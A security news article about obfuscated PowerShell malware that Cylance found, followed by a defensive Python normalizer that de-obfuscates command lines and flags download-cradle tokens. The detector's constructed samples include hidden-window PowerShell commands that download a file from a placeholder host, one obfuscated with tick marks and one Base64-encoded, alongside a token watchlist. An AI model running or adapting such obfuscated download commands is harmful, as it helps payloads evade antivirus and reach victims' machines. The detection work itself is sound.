The malware was discovered while the team at Cylance was studying malicious scripts that were rarely detected by antivirus. A malware file using PowerShell employed an obfuscation method to hide its scripts from detection tools. Cylance describes the file in question as a ZIP archive with a PDF document and a VBS script embedded. In testing, the company found that the malware was detected by just three antivirus products. In terms of delivery, the package is quite standard and matches familiar obfuscation techniques, such as compressing the malware and encrypting it within code:
- Packers, which compress or “pack” a malware program
- Crypters, which encrypt a malware program (or portions thereof)
- Other obfuscators, which mutate – but do not neuter – the malware program in a variety of ways, thus changing the overall number of bytes in the program
Once loaded, the malware has a different signature and hash, making it harder for antivirus solutions to find: “These techniques change the overall structure of a piece of malware without altering its function,” explained Cylance. “Often, this has the overall result of creating layers which act to bury the ultimate payload, like the nested figures in a Russian doll.”
Exploiting PowerShell
Malware uses PowerShell as a legitimacy shield. The VBS script uses a simple Base64 encoding that is enough to confuse at first glance. Using Microsoft PowerShell, the VBS script downloads a DAT file undetected. The techniques used to achieve this include variable assignment and tick marks to confuse antivirus programs. “The cat-and-mouse game of detection and response isn’t new,” Kevin Livelli, director of threat intelligence at Cylance, told Threatpost. “Attackers, whether they’re advanced groups or common criminals, are astute observers of target defenses and adapt accordingly. Malware doesn’t have to be especially complicated or even new to be effective. Obfuscation gives attackers a simple and cheap way to get the job done until the industry adapts and attackers move on to the next technique.”
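As an added illustration of how a defender sees through the layers described above (example code, not from Cylance or Threatpost), this Python normalizer decodes a Base64 -EncodedCommand, strips tick marks, folds string concatenation and single-assignment variables, and only then matches the command line against a watchlist of download-cradle tokens. The sample command lines, the example.invalid host and the token watchlist are constructed for this example.

```python
import base64
import re

# Watchlist of download-cradle tokens (chosen for this example, not exhaustive).
SUSPICIOUS_TOKENS = ("net.webclient", "downloadfile", "downloadstring",
                     "invoke-expression", "frombase64string")
# -e / -ec / -enc / -encodedcommand followed by a Base64 blob
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*'([^']*)'\s*;?")  # $name='literal';
CONCAT_RE = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")     # 'a'+'b'

def decode_encoded_command(cmd: str) -> str:
    """Swap a -EncodedCommand blob for its UTF-16LE plaintext; leave invalid input as is."""
    m = ENC_RE.search(cmd)
    if not m:
        return cmd
    try:
        plain = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmd
    return cmd[:m.start()] + plain + cmd[m.end():]

def normalize(cmd: str) -> str:
    """Peel Base64, tick marks, concatenation and single-use variables."""
    s = decode_encoded_command(cmd)
    s = s.replace("`", "")              # Ne`t.We`bClient -> Net.WebClient
    while CONCAT_RE.search(s):          # 'Net.'+'WebClient' -> 'Net.WebClient'
        s = CONCAT_RE.sub(r"'\1\2'", s)
    variables = {}
    def record(m):                      # remember $name='literal' and drop it
        variables[m.group(1)] = m.group(2)
        return ""
    s = ASSIGN_RE.sub(record, s)
    for name, value in variables.items():   # spell out each later $name use
        s = re.sub(r"\$" + re.escape(name) + r"\b", lambda _, v=value: v, s)
    return s.lower()

def suspicious_tokens(cmd: str) -> list:
    """Watchlist tokens visible once the command line is normalized."""
    return [t for t in SUSPICIOUS_TOKENS if t in normalize(cmd)]

# Constructed samples in the style the article describes (not from the report).
_PLAIN = "$c='Net.'+'Web'+'Client';$o=New-Object $c;$o.DownloadFile('http://example.invalid/a.dat','a.dat')"
SAMPLES = {
    "ticks": "powershell -nop -w hidden (New-Object Ne`t.We`bCl`ient).Dow`nloadFile('http://example.invalid/a.dat','a.dat')",
    "encoded": "powershell -enc " + base64.b64encode(_PLAIN.encode("utf-16-le")).decode(),
    "benign": "powershell -Command Get-ChildItem -Path C:\\Logs | Measure-Object",
}
for _name, _cmd in SAMPLES.items():
    print(f"{_name:8s} -> {suspicious_tokens(_cmd) or 'clean'}")
```

Matching on the raw command line instead would miss both obfuscated samples, which is exactly the gap the quoted antivirus results point at.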